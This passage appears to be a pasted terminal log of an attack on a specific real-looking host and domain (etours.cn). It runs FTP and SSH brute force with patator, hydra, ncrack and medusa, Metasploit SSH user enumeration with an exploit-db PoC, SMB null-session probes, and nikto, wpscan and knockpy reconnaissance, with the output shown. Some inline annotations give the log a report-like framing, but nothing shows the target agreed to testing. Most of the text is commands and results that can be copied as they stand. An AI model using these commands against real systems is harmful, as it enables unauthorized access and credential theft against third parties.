  2975. @184.154.192.250: msfadmin
  2976. oracle@184.154.192.250: oracle
  2977. @184.154.192.250: mysql
  2978. @184.154.192.250: nobody
  2979. @184.154.192.250: owaspbwa
  2980. @184.154.192.250: postfix
  2981. @184.154.192.250: postgres
  2982. @184.154.192.250: private
  2983. @184.154.192.250: proftpd
  2984. @184.154.192.250: public
  2985. @184.154.192.250: root
  2986. @184.154.192.250: superadmin
  2987. @184.154.192.250: support
  2988. @184.154.192.250: sys
  2989. @184.154.192.250: systemadmin
  2990. @184.154.192.250: systemadministrator
  2991. @184.154.192.250: test
  2992. @184.154.192.250: tomcat
  2993. @184.154.192.250: system
  2994. @184.154.192.250: user
  2995. @184.154.192.250: webmaster
  2996. www-data@184.154.192.250: www-data
  2997. Fortimanager_Access@184.154.192.250: Fortimanager_Access
  2998. ######## Scan completed at Wed Jan 22 15:02:06 2020 #########
  2999. 34 results.
  3000.  
  3001. 34 queries in 105 seconds (0.3 queries / sec)
  3002.  
  3003.  
  3004. root@blackbox:/opt# git clone https://github.com/lanjelot/patator
  3005. root@blackbox:/opt/patator# python patator.py ftp_login --help
  3006.  
  3007.  
  3008. root@blackbox:/opt/patator# patator ftp_login host=184.154.192.250 user=admin password=FILE0 0=/opt/commix/src/txt/passwords_john.txt -x ignore:mesg='Login incorrect.' -x ignore,reset,retry:code=500
  3009.  
  3010. 15:03:18 patator INFO - Starting Patator v0.7 (https://github.com/lanjelot/patator) at 2020-01-22 15:03 CST
  3011. 15:03:18 patator INFO - Progress: 0.0% (0/1) | Speed: 10 r/s | ETC: 15:03:18 (00:00:00 remaining)
  3012. 15:03:18 patator INFO -
  3013. 15:03:18 patator INFO - code size time | candidate | num | mesg
  3014. 15:03:18 patator INFO - -----------------------------------------------------------------------------
  3015. 15:06:01 patator INFO - Hits/Done/Skip/Fail/Size: 0/3108/0/0/3108, Avg: 19 r/s, Time: 0h 2m 43s
  3016.  
  3017.  
  3018. SSH USERS ENUMERATION
         Caveat: RHOSTS in the Metasploit run below is 84.154.192.250 (leading "1" missing), so the "User 'root' found" result was obtained against a different address, if any, and must be repeated against 184.154.192.250. The timing-attack action and the exploit-db 45210 PoC are both probabilistic; single runs should be treated as unconfirmed, and "root" existing on a Linux host is not informative on its own.
  3019.  
  3020. root@blackbox:~# locate users | grep users.txt
  3021. /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3022.  
  3023. msf5 > use auxiliary/scanner/ssh/ssh_enumusers
  3024. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set action Timing Attack
  3025. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set RHOSTS 84.154.192.250
  3026. msf5 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3027. USER_FILE => /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt
  3028. msf5 auxiliary(scanner/ssh/ssh_enumusers) > run
  3029.  
  3030. SSH - User 'root' found
  3031.  
  3032. https://www.exploit-db.com/exploits/45210
  3033.  
  3034. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 admin
  3035. root@blackbox:~/Downloads# python 45210.py --port 22 184.154.192.250 root
  3036.  
  3037.  
  3038. SSH BRUTE (reference commands; password authentication is offered per the ssh_scan output below, but no output or result of these commands is recorded in this transcript — no credential was found here)
  3039.  
  3040. use auxiliary/scanner/ssh/ssh_login
  3041. msf exploit (ssh_login)>set rhosts 184.154.192.250
  3042. msf exploit (ssh_login)>set user_file /root/Desktop/user.txt
  3043. msf exploit (ssh_login)>set pass_file /root/Desktop/pass.txt
  3044. msf exploit (ssh_login)>exploit
  3045.  
  3046.  
  3047. hydra -L /usr/share/sniper/plugins/BruteX/wordlists/simple-users.txt -P /opt/SecLists/Passwords/Common-Credentials/top-20-common-SSH-passwords.txt ssh://184.154.192.250 -t 4
  3048.  
  3049. patator ssh_login host=184.154.192.250 user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
  3050.  
  3051. ncrack -v -U /root/Desktop/user.txt -P /root/Desktop/pass.txt 184.154.192.250:22
  3052.  
  3053. medusa -h 184.154.192.250 -U /root/Desktop/user.txt -P /root/Desktop/pass.txt -M ssh
  3054.  
  3055.  
  3056. usernames list
  3057. /opt/SecLists/Usernames/top-usernames-shortlist.txt
  3058.  
  3059. passwords list
  3060. /opt/SecLists/Passwords/Common-Credentials/10-million-password-list-top-1000000.txt
  3061.  
  3062. passwords list combo
  3063. /opt/SecLists/Passwords/Default-Credentials/ssh-betterdefaultpasslist.txt
  3064.  
  3065. root@blackbox:~# ssh_scan -t 184.154.192.250
  3066.  
  3067.  
  3068. SSH SCAN
         Reading the ssh_scan output below: banner OpenSSH_4.3; only SHA-1 DH key exchange (including 1024-bit group1), MD5/SHA-1 MACs, CBC/arcfour ciphers and password auth are offered — hence Mozilla Modern grade F. A 4.3 banner may be a long-term-support vendor build with backported fixes, so do not map CVEs from the version string alone; confirm against the vendor package version. Record the host key fingerprints for later comparison (duplicate_host_key_ips is empty here).
  3069.  
  3070. root@blackbox:/opt/smbmap# ssh_scan -t 184.154.192.250
  3071. [
  3072. {
  3073. "ssh_scan_version": "0.0.42",
  3074. "ip": "184.154.192.250",
  3075. "hostname": "server.etours.cn",
  3076. "port": 22,
  3077. "server_banner": "SSH-2.0-OpenSSH_4.3",
  3078. "ssh_version": 2.0,
  3079. "os": "unknown",
  3080. "os_cpe": "o:unknown",
  3081. "ssh_lib": "openssh",
  3082. "ssh_lib_cpe": "a:openssh:openssh:4.3",
  3083. "key_algorithms": [
  3084. "diffie-hellman-group-exchange-sha1",
  3085. "diffie-hellman-group14-sha1",
  3086. "diffie-hellman-group1-sha1"
  3087. ],
  3088. "encryption_algorithms_client_to_server": [
  3089. "aes128-ctr",
  3090. "aes192-ctr",
  3091. "aes256-ctr",
  3092. "arcfour256",
  3093. "arcfour128",
  3094. "aes128-cbc",
  3095. "3des-cbc",
  3096. "blowfish-cbc",
  3097. "cast128-cbc",
  3098. "aes192-cbc",
  3099. "aes256-cbc",
  3100. "arcfour",
  3101. "rijndael-cbc@lysator.liu.se"
  3102. ],
  3103. "encryption_algorithms_server_to_client": [
  3104. "aes128-ctr",
  3105. "aes192-ctr",
  3106. "aes256-ctr",
  3107. "arcfour256",
  3108. "arcfour128",
  3109. "aes128-cbc",
  3110. "3des-cbc",
  3111. "blowfish-cbc",
  3112. "cast128-cbc",
  3113. "aes192-cbc",
  3114. "aes256-cbc",
  3115. "arcfour",
  3116. "rijndael-cbc@lysator.liu.se"
  3117. ],
  3118. "mac_algorithms_client_to_server": [
  3119. "hmac-md5",
  3120. "hmac-sha1",
  3121. "hmac-ripemd160",
  3122. "hmac-ripemd160@openssh.com",
  3123. "hmac-sha1-96",
  3124. "hmac-md5-96"
  3125. ],
  3126. "mac_algorithms_server_to_client": [
  3127. "hmac-md5",
  3128. "hmac-sha1",
  3129. "hmac-ripemd160",
  3130. "hmac-ripemd160@openssh.com",
  3131. "hmac-sha1-96",
  3132. "hmac-md5-96"
  3133. ],
  3134. "compression_algorithms_client_to_server": [
  3135. "none",
  3136. "zlib@openssh.com"
  3137. ],
  3138. "compression_algorithms_server_to_client": [
  3139. "none",
  3140. "zlib@openssh.com"
  3141. ],
  3142. "languages_client_to_server": [
  3143.  
  3144. ],
  3145. "languages_server_to_client": [
  3146.  
  3147. ],
  3148. "auth_methods": [
  3149. "publickey",
  3150. "gssapi-with-mic",
  3151. "password"
  3152. ],
  3153. "keys": {
  3154. "rsa": {
  3155. "raw": "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAQEA7KnYh43OYzJfoqtaHDqyUUbN3AkmyU4UhmHokahcHmg5okzEqkYX6IzLepxU1UgFFCaOMozBF/fU0iibocOidKZZST/13CvcRtaHXCwtZEFii+9NopBk08q7tCu0N6lv1IZKHWvBdIKalwzHpnwYntpvmPR3Y7tfHtxWpF/lh7TGCzdah1aeuET1P8hp7dGjkt6f07pbf/j/8CjMDp4DLVxRCdSL9DlZuqMYi0qZMk9g99YCorkQDUO20lHL89zzUXiDBEpEKVsrf9JFMb4/MRLaDQ8sVoBqPQRuFYFQaNgWkHs88OrtdV3MpMhaRxLcGcHtkzeAlc5OTAodzWgwxw==",
  3156. "length": 2048,
  3157. "fingerprints": {
  3158. "md5": "48:4f:ba:b1:e8:ae:12:ee:2b:e9:38:87:93:38:5c:4d",
  3159. "sha1": "0d:13:d6:24:42:42:85:97:36:3c:b4:57:c9:83:57:0c:12:73:4f:a2",
  3160. "sha256": "a8:0b:2f:13:a4:dd:f2:00:4f:ad:65:e7:18:70:d5:66:60:eb:34:0b:69:f0:b4:d6:b7:0a:03:01:37:56:f5:d9"
  3161. }
  3162. }
  3163. },
  3164. "dns_keys": [
  3165.  
  3166. ],
  3167. "duplicate_host_key_ips": [
  3168.  
  3169. ],
  3170. "compliance": {
  3171. "policy": "Mozilla Modern",
  3172. "compliant": false,
  3173. "recommendations": [
  3174. "Add these key exchange algorithms: curve25519-sha256@libssh.org,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,diffie-hellman-group-exchange-sha256",
  3175. "Add these MAC algorithms: hmac-sha2-512-etm@openssh.com,hmac-sha2-256-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-512,hmac-sha2-256,umac-128@openssh.com",
  3176. "Add these encryption ciphers: chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com",
  3177. "Remove these key exchange algorithms: diffie-hellman-group-exchange-sha1, diffie-hellman-group14-sha1, diffie-hellman-group1-sha1",
  3178. "Remove these MAC algorithms: hmac-md5, hmac-sha1, hmac-ripemd160, hmac-ripemd160@openssh.com, hmac-sha1-96, hmac-md5-96",
  3179. "Remove these encryption ciphers: arcfour256, arcfour128, aes128-cbc, 3des-cbc, blowfish-cbc, cast128-cbc, aes192-cbc, aes256-cbc, arcfour, rijndael-cbc@lysator.liu.se",
  3180. "Remove these authentication methods: gssapi-with-mic, password"
  3181. ],
  3182. "references": [
  3183. "https://wiki.mozilla.org/Security/Guidelines/OpenSSH"
  3184. ],
  3185. "grade": "F"
  3186. },
  3187. "start_time": "2020-01-22 15:10:54 -0600",
  3188. "end_time": "2020-01-22 15:10:57 -0600",
  3189. "scan_duration_seconds": 3.036491516
  3190. }
  3191. ]
  3192.  
  3193.  
  3194. SMB CHECK — not applicable on this host: the full TCP scan above shows no 139/445, the smbmap attempts below returned nothing, and the nmap smb-vuln* run was pointed at 21/22/80/443, where those scripts never execute (they only run against SMB ports), so its clean output is not a negative result for SMB.
  3195.  
  3196.  
  3197. root@blackbox:/opt# git clone https://github.com/ShawnDEvans/smbmap.git
  3198. root@blackbox:/opt# cd smbmap/
  3199. root@blackbox:/opt/smbmap# python3 -m pip install -r requirements.txt
  3200.  
  3201. root@blackbox:/opt/smbmap# python3 smbmap.py -u admin -p admin -d workgroup -H 184.154.192.250
  3202.  
  3203. root@blackbox:/opt/smbmap# python3 smbmap.py -u guest -p "" -H 184.154.192.250
  3204.  
  3205. Using null session
  3206.  
  3207. root@blackbox:/opt/smbmap# python3 smbmap.py -H 184.154.192.250 -r
  3208.  
  3209. Guest Session with port specified for Samba
  3210.  
  3211. root@blackbox:/opt/smbmap# python3 smbmap.py -u "" -p "" -H 184.154.192.250 -P 139
  3212.  
  3213. root@blackbox:/opt/smbmap# python3 smbmap.py -u administrator -p administrator -H 184.154.192.250
  3214.  
  3215.  
  3216. root@blackbox:/opt/smbmap# nmap --script smb-vuln* -p 137,139,443,80,22,21 184.154.192.250 --open
  3217. Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-22 15:08 CST
  3218. Nmap scan report for server.etours.cn (184.154.192.250)
  3219. Host is up (0.081s latency).
  3220. Not shown: 2 closed ports
  3221. PORT STATE SERVICE
  3222. 21/tcp open ftp
  3223. 22/tcp open ssh
  3224. 80/tcp open http
  3225. 443/tcp open https
  3226.  
  3227. Nmap done: 1 IP address (1 host up) scanned in 1.01 seconds
  3228.  
  3229. NIKTO CHECK (-C all selects every CGI directory, which is why this run took 26400 requests / ~2.25 h). Useful findings below: missing X-Frame-Options and X-Content-Type-Options headers, Apache ETag inode leak, /icons/ directory listing, the PleskLin header (Plesk-managed host) and, most importantly, the Link header pointing at /blog/wp-json/, which reveals the WordPress install scanned next.
  3230.  
  3231. root@blackbox:/opt# nikto -h etours.cn -C all
  3232. - Nikto v2.1.6
  3233. ---------------------------------------------------------------------------
  3234. + Target IP: 184.154.192.250
  3235. + Target Hostname: etours.cn
  3236. + Target Port: 80
  3237. + Start Time: 2020-01-23 03:57:53 (GMT-6)
  3238. ---------------------------------------------------------------------------
  3239. + Server: Apache
  3240. + The anti-clickjacking X-Frame-Options header is not present.
  3241. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
  3242. + The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
  3243. + Root page / redirects to: http://www.etours.cn/
  3244. + Retrieved x-powered-by header: PleskLin
  3245. + Server may leak inodes via ETags, header found with file /6BsxYMU7.pl, inode: 20758719, size: 954, mtime: Wed Sep 14 18:10:28 2011
  3246. + Uncommon header 'link' found, with contents: <http://www.etours.cn/blog/wp-json/>; rel="https://api.w.org/"
  3247. + OSVDB-3092: /cgi-bin/test/test.cgi: This might be interesting...
  3248. + OSVDB-3268: /icons/: Directory indexing found.
  3249. + OSVDB-3233: /icons/README: Apache default file found.
  3250. + 26400 requests: 0 error(s) and 9 item(s) reported on remote host
  3251. + End Time: 2020-01-23 06:12:41 (GMT-6) (8088 seconds)
  3252. ---------------------------------------------------------------------------
  3253. + 1 host(s) tested
  3254.  
  3255.  
  3256.  
  3257. http://www.etours.cn/blog/wp-json/
  3258.  
  3259. root@blackbox:/opt# git clone https://github.com/wpscanteam/wpscan.git
  3260. root@blackbox:/opt# cd wpscan
  3261. root@blackbox:/opt/wpscan# gem install wpscan
  3262.  
  3263.  
  3264. root@blackbox:/opt/wpscan# nano ~/.wpscan/scan.yml
  3265.  
  3266. cli_options:
  3267. api_token: <your WPScan API token>   # needed for the vulnerability data shown in the scan below; keep it out of shared pastes
  3268.  
  3269. root@blackbox:/opt/wpscan# wpscan --url http://www.etours.cn/blog/ --enumerate u1-100
  3270. _______________________________________________________________
  3271. __ _______ _____
  3272. \ \ / / __ \ / ____|
  3273. \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
  3274. \ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
  3275. \ /\ / | | ____) | (__| (_| | | | |
  3276. \/ \/ |_| |_____/ \___|\__,_|_| |_|
  3277.  
  3278. WordPress Security Scanner by the WPScan Team
  3279. Version 3.7.7
  3280. Sponsored by Automattic - https://automattic.com/
  3281. @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
  3282. _______________________________________________________________
  3283.  
  3284. [+] URL: http://www.etours.cn/blog/
  3285. [+] Started: Wed Jan 22 16:15:53 2020
  3286.  
  3287. Interesting Finding(s):
  3288.  
  3289. [+] http://www.etours.cn/blog/
  3290. | Interesting Entries:
  3291. | - Server: Apache
  3292. | - X-Powered-By: PleskLin
  3293. | Found By: Headers (Passive Detection)
  3294. | Confidence: 100%
  3295.  
  3296. [+] http://www.etours.cn/blog/xmlrpc.php
  3297. | Found By: Link Tag (Passive Detection)
  3298. | Confidence: 100%
  3299. | Confirmed By: Direct Access (Aggressive Detection), 100% confidence
  3300. | References:
  3301. | - http://codex.wordpress.org/XML-RPC_Pingback_API
  3302. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
  3303. | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
  3304. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
  3305. | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
  3306.  
  3307. [+] http://www.etours.cn/blog/readme.html
  3308. | Found By: Direct Access (Aggressive Detection)
  3309. | Confidence: 100%
  3310.  
  3311. [+] http://www.etours.cn/blog/wp-cron.php
  3312. | Found By: Direct Access (Aggressive Detection)
  3313. | Confidence: 60%
  3314. | References:
  3315. | - https://www.iplocation.net/defend-wordpress-from-ddos
  3316. | - https://github.com/wpscanteam/wpscan/issues/1299
  3317.  
  3318. [+] WordPress version 5.1.1 identified (Insecure, released on 2019-03-13).
  3319. | Found By: Rss Generator (Passive Detection)
  3320. | - http://www.etours.cn/blog/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3321. | - http://www.etours.cn/blog/comments/feed/, <generator>https://wordpress.org/?v=5.1.1</generator>
  3322. |
  3323. | [!] 12 vulnerabilities identified:
  3324. |
  3325. | [!] Title: WordPress <= 5.2.2 - Cross-Site Scripting (XSS) in URL Sanitisation
  3326. | Fixed in: 5.1.2
  3327. | References:
  3328. | - https://wpvulndb.com/vulnerabilities/9867
  3329. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16222
  3330. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3331. | - https://github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
  3332. | - https://hackerone.com/reports/339483
  3333. |
  3334. | [!] Title: WordPress 5.0-5.2.2 - Authenticated Stored XSS in Shortcode Previews
  3335. | Fixed in: 5.1.2
  3336. | References:
  3337. | - https://wpvulndb.com/vulnerabilities/9864
  3338. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16219
  3339. | - https://wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
  3340. | - https://fortiguard.com/zeroday/FG-VD-18-165
  3341. | - https://www.fortinet.com/blog/threat-research/wordpress-core-stored-xss-vulnerability.html
  3342. |
  3343. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Customizer
  3344. | Fixed in: 5.1.3
  3345. | References:
  3346. | - https://wpvulndb.com/vulnerabilities/9908
  3347. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17674
  3348. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3349. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3350. |
  3351. | [!] Title: WordPress <= 5.2.3 - Unauthenticated View Private/Draft Posts
  3352. | Fixed in: 5.1.3
  3353. | References:
  3354. | - https://wpvulndb.com/vulnerabilities/9909
  3355. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17671
  3356. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3357. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3358. | - https://github.com/WordPress/WordPress/commit/f82ed753cf00329a5e41f2cb6dc521085136f308
  3359. | - https://0day.work/proof-of-concept-for-wordpress-5-2-3-viewing-unauthenticated-posts/
  3360. |
  3361. | [!] Title: WordPress <= 5.2.3 - Stored XSS in Style Tags
  3362. | Fixed in: 5.1.3
  3363. | References:
  3364. | - https://wpvulndb.com/vulnerabilities/9910
  3365. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17672
  3366. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3367. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3368. |
  3369. | [!] Title: WordPress <= 5.2.3 - JSON Request Cache Poisoning
  3370. | Fixed in: 5.1.3
  3371. | References:
  3372. | - https://wpvulndb.com/vulnerabilities/9911
  3373. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17673
  3374. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3375. | - https://github.com/WordPress/WordPress/commit/b224c251adfa16a5f84074a3c0886270c9df38de
  3376. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3377. |
  3378. | [!] Title: WordPress <= 5.2.3 - Server-Side Request Forgery (SSRF) in URL Validation
  3379. | Fixed in: 5.1.3
  3380. | References:
  3381. | - https://wpvulndb.com/vulnerabilities/9912
  3382. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17669
  3383. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17670
  3384. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3385. | - https://github.com/WordPress/WordPress/commit/9db44754b9e4044690a6c32fd74b9d5fe26b07b2
  3386. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3387. |
  3388. | [!] Title: WordPress <= 5.2.3 - Admin Referrer Validation
  3389. | Fixed in: 5.1.3
  3390. | References:
  3391. | - https://wpvulndb.com/vulnerabilities/9913
  3392. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-17675
  3393. | - https://wordpress.org/news/2019/10/wordpress-5-2-4-security-release/
  3394. | - https://github.com/WordPress/WordPress/commit/b183fd1cca0b44a92f0264823dd9f22d2fd8b8d0
  3395. | - https://blog.wpscan.org/wordpress/security/release/2019/10/15/wordpress-524-security-release-breakdown.html
  3396. |
  3397. | [!] Title: WordPress <= 5.3 - Improper Access Controls in REST API
  3398. | Fixed in: 5.1.4
  3399. | References:
  3400. | - https://wpvulndb.com/vulnerabilities/9973
  3401. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20043
  3402. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16788
  3403. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3404. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-g7rg-hchx-c2gw
  3405. |
  3406. | [!] Title: WordPress <= 5.3 - Stored XSS via Crafted Links
  3407. | Fixed in: 5.1.4
  3408. | References:
  3409. | - https://wpvulndb.com/vulnerabilities/9975
  3410. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20042
  3411. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3412. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16773
  3413. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3414. | - https://hackerone.com/reports/509930
  3415. | - https://github.com/WordPress/wordpress-develop/commit/1f7f3f1f59567e2504f0fbebd51ccf004b3ccb1d
  3416. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-xvg2-m2f4-83m7
  3417. |
  3418. | [!] Title: WordPress <= 5.3 - Stored XSS via Block Editor Content
  3419. | Fixed in: 5.1.4
  3420. | References:
  3421. | - https://wpvulndb.com/vulnerabilities/9976
  3422. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16781
  3423. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-16780
  3424. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3425. | - https://github.com/WordPress/wordpress-develop/security/advisories/GHSA-pg4x-64rh-3c9v
  3426. |
  3427. | [!] Title: WordPress <= 5.3 - wp_kses_bad_protocol() Colon Bypass
  3428. | Fixed in: 5.1.4
  3429. | References:
  3430. | - https://wpvulndb.com/vulnerabilities/10004
  3431. | - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-20041
  3432. | - https://wordpress.org/news/2019/12/wordpress-5-3-1-security-and-maintenance-release/
  3433. | - https://github.com/WordPress/wordpress-develop/commit/b1975463dd995da19bb40d3fa0786498717e3c53
  3434.  
  3435. [+] WordPress theme in use: twentyeleven
  3436. | Location: http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3437. | Last Updated: 2019-05-07T00:00:00.000Z
  3438. | Readme: http://www.etours.cn/blog/wp-content/themes/twentyeleven/readme.txt
  3439. | [!] The version is out of date, the latest version is 3.3
  3440. | Style URL: http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css
  3441. | Style Name: Twenty Eleven
  3442. | Style URI: http://wordpress.org/extend/themes/twentyeleven
  3443. | Description: The 2011 theme for WordPress is sophisticated, lightweight, and adaptable. Make it yours with a cust...
  3444. | Author: the WordPress team
  3445. | Author URI: http://wordpress.org/
  3446. |
  3447. | Found By: Css Style In Homepage (Passive Detection)
  3448. | Confirmed By: Css Style In 404 Page (Passive Detection)
  3449. |
  3450. | Version: 1.2 (80% confidence)
  3451. | Found By: Style (Passive Detection)
  3452. | - http://www.etours.cn/blog/wp-content/themes/twentyeleven/style.css, Match: 'Version: 1.2'
  3453.  
  3454. [+] Enumerating Users (via Passive and Aggressive Methods)
  3455. Brute Forcing Author IDs - Time: 00:00:18 <==============================================================================================================> (100 / 100) 100.00% Time: 00:00:18
  3456.  
  3457. [i] User(s) Identified:
  3458.  
  3459. [+] admin
  3460. | Found By: Author Posts - Author Pattern (Passive Detection)
  3461. | Confirmed By:
  3462. | Rss Generator (Passive Detection)
  3463. | Wp Json Api (Aggressive Detection)
  3464. | - http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3465. | Rss Generator (Aggressive Detection)
  3466. | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
  3467. | Login Error Messages (Aggressive Detection)
  3468.  
  3469. [+] WPVulnDB API OK
  3470. | Plan: free
  3471. | Requests Done (during the scan): 2
  3472. | Requests Remaining: 48
  3473.  
  3474. [+] Finished: Wed Jan 22 16:16:42 2020
  3475. [+] Requests Done: 140
  3476. [+] Cached Requests: 7
  3477. [+] Data Sent: 32.334 KB
  3478. [+] Data Received: 488.05 KB
  3479. [+] Memory used: 138.605 MB
  3480. [+] Elapsed time: 00:00:48
  3481.  
  3482.  
  3483. http://www.etours.cn/blog/phpinfo.php
  3484. (if this page renders, it is an information-disclosure finding on its own: PHP version, loaded extensions, document root and environment variables are all shown; report it and recommend removing the file from the web root)
  3485. Proudly powered by WordPress
  3486.  
  3487. http://www.etours.cn/blog/wp-login.php
  3488.  
  3489.  
  3490. http://www.etours.cn/blog/
  3491. http://www.etours.cn/blog/xmlrpc.php
  3492. http://www.etours.cn/blog/readme.html
  3493. http://www.etours.cn/blog/wp-cron.php
  3494. http://www.etours.cn/blog/wp-content/themes/twentyeleven/
  3495. http://www.etours.cn/blog/wp-json/wp/v2/users/?per_page=100&page=1
  3496. (findings worth writing up from this list: the wp-json users endpoint is what confirmed the 'admin' login name in the wpscan output above, and a reachable xmlrpc.php lets one request carry many login attempts via system.multicall -- recommend restricting both, on top of the core update: 5.1.1 is several security releases behind per the wpscan list above)
  3497.  
  3498.  
  3499. SUBDOMAIN SCAN USING KNOCK
  3500.  
  3501.  
  3502. root@blackbox:/# cd /opt/
  3503. root@blackbox:/opt# apt-get install python-dnspython
  3504. root@blackbox:/opt# git clone https://github.com/guelfoweb/knock.git
  3505. root@blackbox:/opt# cd knock
  3506. root@blackbox:/opt/knock# leafpad knockpy/config.json
  3507.  
  3508. INSERT YOUR VIRUS TOTAL API KEY (the key sits in plaintext in knockpy/config.json inside the cloned repo -- keep it out of any commit or shared copy of this tree; note also that the VirusTotal lookup sends the target domain to a third party, which matters on engagements that require low-profile OSINT)
  3509.  
  3510. root@blackbox:/opt/knock# python setup.py install
  3511.  
  3512.  
  3513. root@blackbox:/opt/knock# knockpy etours.cn
  3514.  
  3515. _ __ _
  3516. | |/ / | | 4.1.1
  3517. | ' / _ __ ___ ___| | ___ __ _ _
  3518. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3519. | . \| | | | (_) | (__| <| |_) | |_| |
  3520. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3521. | | __/ |
  3522. |_| |___/
  3523.  
  3524. + checking for virustotal subdomains: YES
  3525. [
  3526. "www.etours.cn",
  3527. "mail.etours.cn",
  3528. "beijing.etours.cn"
  3529. ]
  3530. + checking for wildcard: NO
  3531. + checking for zonetransfer: NO
  3532. + resolving target: YES
  3533. - scanning for subdomain...
  3534.  
  3535. Ip Address Status Type Domain Name Server
  3536. ---------- ------ ---- ----------- ------
  3537. 184.154.192.250 200 host beijing.etours.cn Apache
  3538. 184.154.192.250 200 host dns.etours.cn Apache
  3539. 184.154.192.250 200 host ftp.etours.cn Apache
  3540. 184.154.192.250 200 host mail.etours.cn Apache
  3541. 184.154.192.250 302 host webmail.etours.cn Apache
  3542. 184.154.192.250 200 host www.etours.cn Apache
  3543.  
  3544.  
  3545. Check zone transfer for domain name
  3546.  
  3547. root@blackbox:/opt/knock# knockpy -r etours.cn
  3548.  
  3549. _ __ _
  3550. | |/ / | | 4.1.1
  3551. | ' / _ __ ___ ___| | ___ __ _ _
  3552. | < | '_ \ / _ \ / __| |/ / '_ \| | | |
  3553. | . \| | | | (_) | (__| <| |_) | |_| |
  3554. |_|\_\_| |_|\___/ \___|_|\_\ .__/ \__, |
  3555. | | __/ |
  3556. |_| |___/
  3557.  
  3558. + checking for virustotal subdomains: YES
  3559. [
  3560. "www.etours.cn",
  3561. "mail.etours.cn",
  3562. "beijing.etours.cn"
  3563. ]
  3564. + checking for wildcard: NO
  3565. + checking for zonetransfer: NO
  3566. + resolving target: YES
  3567. {
  3568. "zonetransfer": {
  3569. "enabled": false,
  3570. "list": []
  3571. },
  3572. "target": "etours.cn",
  3573. "hostname": "etours.cn",
  3574. "virustotal": [
  3575. "www.etours.cn",
  3576. "mail.etours.cn",
  3577. "beijing.etours.cn"
  3578. ],
  3579. "alias": [],
  3580. "wildcard": {
  3581. "detected": {},
  3582. "test_target": "flvckazhp.etours.cn",
  3583. "enabled": false,
  3584. "http_response": {}
  3585. },
  3586. "ipaddress": [
  3587. "184.154.192.250"
  3588. ],
